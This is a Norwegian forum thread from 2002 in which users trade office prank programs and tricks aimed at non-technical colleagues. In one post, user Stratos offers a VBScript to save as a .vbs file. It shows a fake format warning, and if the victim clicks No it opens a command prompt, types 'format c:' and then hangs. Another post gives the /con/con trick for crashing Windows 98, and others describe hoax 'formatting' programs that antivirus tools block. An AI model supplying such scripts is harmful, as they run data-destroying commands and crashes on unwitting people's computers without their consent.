Format_C Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Vet det finnes en masse små programmer som kan sremme vettet av mine ikke så altfor PC-kyndige kollegaer, f.eks simulere sletting/formattering av HD`en og andre morsomme meldinger. Noen av dere vet sikkert hvor jeg kan finne sånt og linker mottaes med takk. Lenke til kommentar
Mr.Hassan Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Hei Format_C! Det finst ein del slike programmer.. Det florerte ein del slike programmer for 5-6år sidan..Har diverrre ingen slike linkar.. Det finst også programm som gjær at du kan opne og lukke cd-romén.Og slik at du kan skrive falske feil meldingar som kommer opp på kollegane dine sin pc.. Men,kor snilt det er å gjære det veit eg ikkje.. Elles så huska eg at for 5-6år sidane la eg og nokre andre inn ein quit komando i irc clienten på skule pcáne slik når andre i dataklassen skulle på irc.. Kunne eg og nokre andre skrive for eksempel "Hei" og så quita dei irc.. Men,vi fortalte dei korleis det fungerte etter ei kort stund..Og fjerna kommandoen fra irc clienten.. Lenke til kommentar
danilovic Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 For to år siden tror jeg det var, la Komputer for alle med en hærskare med PC-aprilspøker på CDen som fulgte med bladet. Tilfeldigvis har jeg den CDen. Kan du ikke lage en ECHO i autoexec eller noe? :smile: Lenke til kommentar
Format_C Skrevet 14. mars 2002 Forfatter Del Skrevet 14. mars 2002 HAAAAHAHAHA, jajaja det er akkurat dette jeg er ute etter. Tro meg, mine kollegaer har ærlig fortjent pek som dette. Kan levende forestille meg uttrykkene deres når CD-rommen begynner å fly ut og inn eller feilmeldingene popper opp. Begynte en ny kar her på Tirsdag og i et uoppmerksomt øyeblikk la jeg inn følgende melding som skrivebordsbakgrunn: Your mouse has moved, You must restart Your computer...... Mannen skjønte ingenting og ringte til slutt IT-ansvarlig som trodde mannen var gal. Gjett om vi lo. Lenke til kommentar
DrDoogie Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Quote: On 2002-03-14 15:05, Format_C skrev:HAAAAHAHAHA, jajaja det er akkurat dette jeg er ute etter. Tro meg, mine kollegaer har ærlig fortjent pek som dette.Kan levende forestille meg uttrykkene deres når CD-rommen begynner å fly ut og inn eller feilmeldingene popper opp.Begynte en ny kar her på Tirsdag og i et uoppmerksomt øyeblikk la jeg inn følgende melding som skrivebordsbakgrunn: Your mouse has moved, You must restart Your computer......Mannen skjønte ingenting og ringte til slutt IT-ansvarlig som trodde mannen var gal. Gjett om vi lo. Haha... ha. //deleted *uff nei det var frekt* [ Denne Melding var redigert av: DrDoogie på 2002-03-14 15:11 ] Lenke til kommentar
SirHartge Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 LOL! Jeg har ett program hjemme som jeg ble skremt av selv, skal legge ut link når jeg kommer hjem sent i kveld. Lenke til kommentar
Mr.Hassan Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Hei! Vel,bakgrunnsbilde feilmeldings spøken er det ein del som har gått på ..(ikkje bokstavelig) Elles finst dei dei personane som går inn på ein foretning som selger data utstyr.(Sølv om ein del ikkje meiner dei har peiling på kva dei selger..) Og seier at dei skulle hatt ein ta2x kabel som passer til tqp enheten i pc etc.. Dei annsatte i butikken begynner virkelig å lure.. Men,det er kanskje litt slemt gjordt.. Lenke til kommentar
walestr Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Hei Jeg har et slikt artig sak.... send mail om dere vil ha den. Lenke til kommentar
Mr.Hassan Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Hei walestr! Kanskje du kunne nemt korleis "den artige saken" fungerer først..? Lenke til kommentar
BBC Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Vær oppmerksom på at noen antivirus-programmer reagerer på enkelte slike "hoax/morro" programmer. Hadde ett program for mange år som "formaterte" harddisken. Norton grep inn og nektet deg tilgang. Lenke til kommentar
Stratos Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Man kan ta en screenshot mens brukeren har et program oppe, og gjøre det til bakgrunn :wink: (Se hvor lenge han sliter for å få lukket det....) Eller script noen artige linjer i VBScript :smile: ----------- Set ws = WScript.CreateObject("Wscript.Shell") svar = Msgbox ("Er du sikker på at du vil formatere c:?", VbYesNo + vbQuestion, "Advarsel.") If svar = vbYes Then Msgbox "Formatering av C: starter...", VbOkOnly + VbExclamation, "Sletter..." ws.SendKeys "^{esc}" ws.SendKeys "{up}" ws.SendKeys "{enter}" ws.SendKeys "{enter}" ElseIf svar = vbNo Then Msgbox "Feiging.", VbOkOnly + VbInfo, "Avbrutt." ws.run ("cmd") WScript.sleep 2000 ws.sendkeys "format c:" ws.Sendkeys "{enter}" Do Until 1=2 Loop End If ----------------- Klipp ut dette og lagre det som en .VBS fil i notepad :wink: (inneholder sikkert en del bugs, har ikkke brukt mange kalorier på å tenke det ut... :razz: ) Måtte fjerne noen kommentartegn... [ Denne Melding var redigert av: Stratos på 2002-03-14 16:54 ] Lenke til kommentar
Stratos Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 ingen som tør å prøve? :wink: Lenke til kommentar
sjanten Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Quote: On 2002-03-14 16:53, Stratos skrev:Man kan ta en screenshot mens brukeren har et program oppe, og gjøre det til bakgrunn :wink:(Se hvor lenge han sliter for å få lukket det....)Eller script noen artige linjer i VBScript :smile: installer opera, lag en jpgfil/tilsvarende (html duger d og), disable høyre museknapp, full screen (F11). da skal'n slite vettu! Lenke til kommentar
miniPax Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 Få dem til å åpne start/kjør, og skriv /con/con (med slash) Funker i win98, er ikke sikker på 95 og ME, men ikke under NT (win2k og XP) Lenke til kommentar
eUnaas Skrevet 14. mars 2002 Del Skrevet 14. mars 2002 ...man bør kanskje passe litt på hva man gjør... når noen firmaer sparker folk for å laste ned 2-3 mp3 filer ...så vet jeg ikke som noe av dette vil bli så poppulært! (hvis du ikke venter til 1 april da! men morro er det!!!! :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: :grin: Lenke til kommentar
Format_C Skrevet 14. mars 2002 Forfatter Del Skrevet 14. mars 2002 borre: Takker for linken, den CD-rom saken skal prøves i morra. Ellers het vel det .exe programmet "Funny" og ble ikke godt motatt av mitt antivirusprogram, men den var utrolig morsom og gjennomført. Stratos: Kjempeide med screenshot, må prøves. Har heldigvis et (i mine øyne) bra arbeidsmiljø så det er nok ingen fare for å få sparken for morsomhetene, dessuten var sjefen delvis med på den skrivebordsspøken. Flere linker evt. filer mottaes med takk [ Denne Melding var redigert av: Format_C på 2002-03-14 18:46 ] Lenke til kommentar
Lurifaksen Skrevet 15. mars 2002 Del Skrevet 15. mars 2002 ta screenshot av desktopen (med ikoner og gjerne en feilmelding hvis det er mulig), og sett det som bakgrunnsbilde. skjul taskbaren og ikonene på desktopen (må vel ha "active desktop på eller noe sånt da). Da stresser folk som bare det og tror at pc'en har klikket, når de klikker på ikonene og start-menyen. (dvs bakgr.bildet) Det største "problemet" er at den "klikker" når de restarter igjen! LOL. :smile: Lenke til kommentar
walestr Skrevet 15. mars 2002 Del Skrevet 15. mars 2002 Quote: On 2002-03-14 15:23, Mr.Hassan skrev:Hei walestr!Kanskje du kunne nemt korleis "den artige saken" fungerer først..? Hei det er slik at ved start scanner Pc...og spørr om du virkelig vil slette ....du forsøker med nei...men den starter likevel....på sluitten kommer det opp at du har slettet alt som heter windows..Det ser proft ut ..også under winXP ...avslutter med svart skjerm og tekst thank goo thi is only a game... Roger [email protected] Lenke til kommentar
GalFisk Skrevet 15. mars 2002 Del Skrevet 15. mars 2002 Åja, den ble jeg litt skremt av første gangen også Antivirus-programmer liker den ikke noe særlig men. Har selv lagd et program som legger en OK-knapp et tilfeldig sted på skjermen, klikker man på den kommer det en til, høyreklikker man på taskbaren kommer det en til, prøver man alt+f4 kommer det nye så lange man holder inne alt, samme med ctrl+alt+delete. Eneste måten å bli kvitt det (w95/98) er å plukke opp et annet program i forgrunnen, slik at ingen av 'knappene' registrerer tastetrykk, og controlaltdelete dem en for en. Litt enklere med taskmanageren i w2k/xp. Programmet er dessverre digert pga at det er skrevet i Delphi, 200kb ca, skal pakke det med en exepacker når jeg gidder. Klikk på voldsfilmen :wink: i signaturen for himsie, dl IRRITERENDE program. Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå